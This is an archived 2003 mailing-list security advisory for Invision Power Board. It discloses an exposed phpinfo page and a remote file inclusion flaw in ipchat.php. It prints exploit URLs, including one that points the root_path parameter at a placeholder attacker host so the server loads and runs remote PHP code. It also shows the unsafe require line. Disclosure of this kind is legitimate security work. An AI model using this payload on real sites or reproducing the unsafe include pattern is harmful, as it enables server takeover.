Vulnwatch mailing list archives

Previous By Date Next
Previous By Thread Next

Invision Power Board (PHP)

From: "Frog Man" <leseulfrog () hotmail com>
Date: Thu, 27 Feb 2003 20:10:23 +0100


Informations :
°°°°°°°°°°°°°°
Website : http://www.invisionboard.com
--------------------------
Version : 1.0.1
Problem : phpinfo()
--------------------------
Version : 1.1.1
Problem : File Including


PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
v1.0.1 :
phpinfo.php :
----------
<?php
phpinfo();
?>
----------

v1.1.1 :
ipchat.php :
-------------------------------------
require $root_path."conf_global.php";
-------------------------------------
(this is a hole if register_globals=ON)


Exploits :
°°°°°°°°°°
v1.0.1 :
http://[target]/phpinfo.php

v1.1.1 :
http://[target]/ipchat.php?root_path=http://[attacker]/
with :
http://[attacker]/conf_global.php


Patchs :
°°°°°°°°
Patchs for both versions has been published on http://www.phpsecure.org .


More Details :
°°°°°°°°°°°°°°
In French :
http://www.frog-man.org/tutos/InvisionPowerBoard.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FInvisionPowerBoard.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools


frog-m@n



_________________________________________________________________
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM ! http://www.fr.msn.be/gsm/servicesms/hotmailparsms
Previous By Date Next
Previous By Thread Next

Current thread: